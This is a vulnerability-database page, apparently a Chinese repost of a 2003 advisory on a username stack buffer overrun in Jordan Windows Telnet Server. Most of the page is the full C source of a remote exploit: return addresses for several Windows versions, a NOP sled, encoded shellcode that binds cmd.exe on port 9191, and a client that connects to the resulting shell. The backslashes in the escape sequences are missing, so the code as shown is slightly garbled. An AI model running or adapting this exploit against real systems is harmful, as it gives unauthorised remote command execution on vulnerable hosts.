Jordan Windows Telnet Server 1.0/1.2 – ‘Username’ Stack Buffer Overrun (2)
漏洞ID | 1054339 | 漏洞类型 | |
发布时间 | 2003-12-29 | 更新时间 | 2003-12-29 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9316/info
Jordan Windows Telnet Server has been reported prone to a remote buffer overrun vulnerability. The issue has been reported to present itself when a username of excessive length is supplied to the Telnet server. Due to a lack of bounds checking, when this username is copied into an insufficient reserved buffer in stack-based memory, data that exceeds the size of the buffer will overrun its bounds and corrupt adjacent memory. An attacker may exploit this condition to corrupt a saved instruction pointer for the vulnerable function.
/*
* Jordan's Windows Telnet server v.1.0 remote exploit
* binds cmd.exe shell on port 9191
*
* Home page: http://www.jordan.com/WindowsTelnetServer
* Advisory: http://security.nnov.ru/search/document.asp?docid=5583
*
* Tested on winxp only, but must work on other win32 systems.
*
* -d4rkgr3y [[email protected]], m00.void.ru
*
*/
#include <string.h>
#include <unistd.h>
#include <netdb.h>
struct
{
char *platform;
long ret;
}
targets[]=
{
{"Windows XP sp0", 0x77F5801C}, // ntdll.dll : jmp esp
{"Windows XP sp1", 0x77fb59cc},
{"Windows 2000 SP1" , 0x77e3cb4c } ,
{"Windows 2000 SP2" , 0x77e2492b } ,
{"Windows 2000 SP3" , 0x77e2afc5 } ,
{"Windows 2000 SP4" , 0x77e14c29 } ,
{"Windows NT sp6", 0x77f0eac3},
{"Windows 98 SE", 0x7fdabfa9},
{"Denial-of-Service attack", 0xdefaced},
};
char payload[] =
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90";
char w32pbshellcode[] =
"xEBx03x5DxEBx05xE8xF8xFFxFFxFFx8BxC5x83xC0x11x33"
"xC9x66xB9xC9x01x80x30x88x40xE2xFAxDDx03x64x03x7C"
"x09x64x08x88x88x88x60xC4x89x88x88x01xCEx74x77xFE"
"x74xE0x06xC6x86x64x60xD9x89x88x88x01xCEx4ExE0xBB"
"xBAx88x88xE0xFFxFBxBAxD7xDCx77xDEx4Ex01xCEx70x77"
"xFEx74xE0x25x51x8Dx46x60xB8x89x88x88x01xCEx5Ax77"
"xFEx74xE0xFAx76x3Bx9Ex60xA8x89x88x88x01xCEx46x77"
"xFEx74xE0x67x46x68xE8x60x98x89x88x88x01xCEx42x77"
"xFEx70xE0x43x65x74xB3x60x88x89x88x88x01xCEx7Cx77"
"xFEx70xE0x51x81x7Dx25x60x78x88x88x88x01xCEx78x77"
"xFEx70xE0x2Cx92xF8x4Fx60x68x88x88x88x01xCEx64x77"
"xFEx70xE0x2Cx25xA6x61x60x58x88x88x88x01xCEx60x77"
"xFEx70xE0x6DxC1x0ExC1x60x48x88x88x88x01xCEx6Ax77"
"xFEx70xE0x6FxF1x4ExF1x60x38x88x88x88x01xCEx5ExBB"
"x77x09x64x7Cx89x88x88xDCxE0x89x89x88x88x77xDEx7C"
"xD8xD8xD8xD8xC8xD8xC8xD8x77xDEx78x03x50xDFxDFxE0"
"x8Ax88xABx6Fx03x44xE2x9ExD9xDBx77xDEx64xDFxDBx77"
"xDEx60xBBx77xDFxD9xDBx77xDEx6Ax03x58x01xCEx36xE0"
"xEBxE5xECx88x01xEEx4Ax0Bx4Cx24x05xB4xACxBBx48xBB"
"x41x08x49x9Dx23x6Ax75x4ExCCxACx98xCCx76xCCxACxB5"
"x01xDCxACxC0x01xDCxACxC4x01xDCxACxD8x05xCCxACx98"
"xDCxD8xD9xD9xD9xC9xD9xC1xD9xD9x77xFEx4AxD9x77xDE"
"x46x03x44xE2x77x77xB9x77xDEx5Ax03x40x77xFEx36x77"
"xDEx5Ex63x16x77xDEx9CxDExECx29xB8x88x88x88x03xC8"
"x84x03xF8x94x25x03xC8x80xD6x4Ax8Cx88xDBxDDxDExDF"
"x03xE4xACx90x03xCDxB4x03xDCx8DxF0x8Bx5Dx03xC2x90"
"x03xD2xA8x8Bx55x6BxBAxC1x03xBCx03x8Bx7DxBBx77x74"
"xBBx48x24xB2x4CxFCx8Fx49x47x85x8Bx70x63x7AxB3xF4"
"xACx9CxFDx69x03xD2xACx8Bx55xEEx03x84xC3x03xD2x94"
"x8Bx55x03x8Cx03x8Bx4Dx63x8AxBBx48x03x5DxD7xD6xD5"
"xD3x4Ax8Cx88";
void usage();
struct hostent *hp;
int main(int argc, char *argv[])
{
unsigned short port=23;
unsigned int sock,addr,hand;
char buf[1032], shit[666];
printf("n Jordan's Windows Telnet server v.1.0 remote exploitn");
printf("ttby m00 Security // m00.void.runn");
if(argc<3 || argc>4) usage(argv[0]);
if((atoi(argv[2]))>5) usage(argv[0]);
if(argv[3]) port = atoi(argv[3]);
memset(buf,'x41',1032);
memcpy(&buf[512], (unsigned char *) &targets[atoi(argv[2])].ret, 4);
memcpy(&buf[516], payload, sizeof(payload));
memcpy(&buf[548], w32pbshellcode, sizeof(w32pbshellcode));
memset(buf+strlen(w32pbshellcode)+548,'x0d',1);
memset(buf+strlen(w32pbshellcode)+548+1,'x0a',1);
printf("~ Resolving hostname => ");
if((hp=gethostbyname(argv[1]))==NULL) {
printf("failedn");
exit(1);
}
printf("donen");
printf("~ Conneting => ");
if((sock=connect_to_host(port))==-1) {
printf("failedn");
exit(1);
}
printf("donen");
printf("~ Sending exploit buffer => ");
sleep(2);
recv(sock,shit,666,0);
send(sock,buf,1032,0);
printf("donen");
printf("~ Connecting to bindshell => ");
usleep(1000);
if((hand=connect_to_host(9191))==-1)
printf("failednn");
else {
printf("donen~ Shell spawned on port 9191 ^ have a nice daynn");
get_shell(hand);
}
close(sock);
exit(0);
}
void usage(char *progname)
{
int i;
printf("Usage: %s <host> <os type> [port]nnWhere 'os type' is:n",progname);
for(i=0;targets[i].platform;i++) {
printf(" %i %sn", i, targets[i].platform);
}
printf("n");
exit(0);
}
int connect_to_host(int port)
{
int sockt;
struct sockaddr_in saddr;
if((sockt=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
return -1;
memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
saddr.sin_family=AF_INET;
saddr.sin_addr.s_addr=*((unsigned long *)hp->h_addr_list[0]);
saddr.sin_port=htons(port);
if(connect(sockt, (struct sockaddr *)&saddr, sizeof(saddr))<0) {
close(sockt);
return -1;
} else
return sockt;
}
int get_shell(int bsh)
{
fd_set rfds;
int retVal,r;
char buf[0x31337];
do {
FD_ZERO(&rfds);
FD_SET(0, &rfds);
FD_SET(bsh, &rfds);
retVal=select(bsh+1, &rfds, NULL, NULL, NULL);
if(retVal) {
if(FD_ISSET(bsh, &rfds)) {
buf[(r=recv(bsh, buf, 8095,0))]=' ';
printf("%s", buf);
}
if(FD_ISSET(0, &rfds)) {
buf[(r=read(0, buf, 8095))]=' ';
send(bsh, buf, strlen(buf), 0);
}
}
} while(retVal && r);
close(bsh);
return 1;
}
相关推荐: BasiliX Webmail Arbitrary File Disclosure Vulnerability
BasiliX Webmail Arbitrary File Disclosure Vulnerability 漏洞ID 1101897 漏洞类型 Input Validation Error 发布时间 2002-06-19 更新时间 2002-06-19 C…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666